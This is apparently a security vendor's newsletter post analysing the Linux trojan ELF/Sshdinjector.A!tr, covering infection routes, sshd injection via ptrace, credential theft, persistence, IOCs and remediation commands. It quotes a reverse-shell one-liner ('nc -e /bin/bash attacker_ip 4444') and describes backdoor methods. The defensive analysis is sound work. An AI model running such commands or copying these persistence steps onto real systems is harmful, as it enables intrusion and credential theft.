Skip to main content
HashnodeFPT IS SecurityFPT IS Security

Command Palette

Search for a command to run...

New malware targets Linux systems and IoT devices

Updated
4 min read
New malware targets Linux systems and IoT devices
L
Lưu Tuấn Anh
Part of seriesNewsletters-eng

Overview

ELF/Sshdinjector.A!tr is a Linux trojan designed to inject malicious code into the SSH process (sshd), steal login credentials, and create a backdoor for hackers. Samples of this malware were primarily detected in mid-November 2024.

Description

  • Type: Trojan

  • Full Name: ELF/Sshdinjector.A!tr

  • Target: Linux operating system

  • Infection Method:

    • Exploits security vulnerabilities on Linux systems

    • Infects via SSH by stealing credentials

    • Injected into legitimate processes like sshd to hide itself

Technical Attack Details

  • Although the initial infection method is not detailed, the ELF/Sshdinjector.A!tr malware spreads through three main ways:

    • Exploiting security vulnerabilities: The malware can exploit unpatched vulnerabilities on Linux systems, with two CVEs noted:

      • CVE-2021-3156 - Privilege escalation vulnerability in sudo.

      • CVE-2019-12735 (Vim & Neovim) – Remote code execution vulnerability via .vimrc file.

    • Brute-force SSH: If the system uses weak passwords, the trojan can brute-force (guess passwords) to access the root account.

    • Infection through malicious software: Installed via fake software packages or third-party malware.

CVE-2021-3156 | feather's blog

  • As soon as the trojan infiltrates the system, it will inject malicious code into the SSHD process (Secure Shell Daemon). This allows the attacker to hide within the system and avoid detection. The malware can use ptrace() to attach to the sshd process and read data from memory.

    • ptrace(PTRACE_ATTACH, target_pid, NULL, NULL): Attach to the sshd process.

    • PTRACE_PEEKDATA: Read data from memory (for example, can retrieve login information).

    • PTRACE_DETACH: Detach from the process after retrieving data.

  • After that, when the user logs into SSH, the malware will record the login information and send it to the command and control (C2) server: 45.125.64[.]200

  • After successfully injecting malicious code into the SSHD process, the attacker will create a backdoor to maintain access to the system. The trojan will create the backdoor by:

    • Modify the ~/.ssh/authorized_keys file to add the hacker's SSH key.

    • Change sshd_config to allow remote root login.

    • Set up a cronjob or rootkit to automatically restart after being shut down.

  • Additionally, another method the malware can use is to modify the PAM file /etc/pam.d/sshd to log passwords.

  • Then, the malware will create a script logger.sh to record passwords:

  • Once a continuous connection to the victim's machine is maintained, the attacker will create reverse shells to send data back to the C2 server using “nc -e /bin/bash attacker_ip 4444“. Alternatively, the attacker can use a Python script.

  • Finally, the attackers will evade detection within the victim's system. Some measures recorded in this campaign include:

    • Hide malicious processes by renaming or impersonating legitimate processes.

    • Disable firewalls and security software if root access is available.

    • Use rootkit techniques to conceal activities.

Impact of ELF/Sshdinjector.A!tr

ELF/Sshdinjector.A!tr is a dangerous Linux trojan that mainly infects systems through SSH. Once infected, it can steal information, create backdoors, slow down the system, or even turn your server into a botnet. Some major impacts of this malware have been recorded as follows:

  • Steal SSH login information

  • Install backdoors and maintain control

  • Abuse server resources for cryptocurrency mining (Cryptojacking)

  • Turn the server into a botnet for DDoS attacks

  • Alter system files and destroy data

  • Spread to other systems via SSH worm

IOC

  1. IP:

    • 45.125.64[.]200

  2. Hash:

    • 94e8540ea39893b6be910cfee0331766e4a199684b0360e367741facca74191f

    • 0e2ed47c0a1ba3e1f07711fb90ac8d79cb3af43e82aa4151e5c7d210c96baebb

    • 6d08ba82bb61b0910a06a71a61b38e720d88f556c527b8463a11c1b68287ce84

Recommendations

If your system is infected with ELF/Sshdinjector.A!tr, take the following actions:

  1. Check the SSH process

    • ps aux | grep sshd

    • If you find an SSH process from a strange directory like /tmp/, /var/tmp/, stop it immediately with:

      • kill -9

  2. Scan the system for malware

    • Install rkhunter and chkrootkit: sudo apt install rkhunter chkrootkit -y

    • Run the programs and perform a scan:

      • sudo rkhunter --check

      • sudo chkrootkit

  3. Check for strange accounts & delete them immediately

    • cat /etc/passwd | grep bash

    • If you see a user, you can delete it with the command: sudo userdel -r <username>

  4. Reinstall SSH if it has been replaced

    • sudo apt reinstall openssh-server

  5. Restrict SSH access by IP

    • sudo ufw allow from <your IP address> to any port 22

Conclusion

ELF/Sshdinjector.A!tr is an extremely dangerous trojan capable of stealing SSH information, creating backdoors, and sending data to hackers. If you suspect your system is infected, immediately isolate it, check the sshd process, scan for rootkits, and update the system.

References

  1. Analyzing ELF/Sshdinjector.A!tr with a Human and Artificial Analyst | FortiGuard Labs

  2. New trojan hijacks Linux and IoT devices | CSO Online

#iot#linux#trojan

Comments

Join the discussion

No comments yet. Be the first to comment.

Newsletters-eng

Part 1 of 50

More from this blog

F

FPT IS Security

761 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.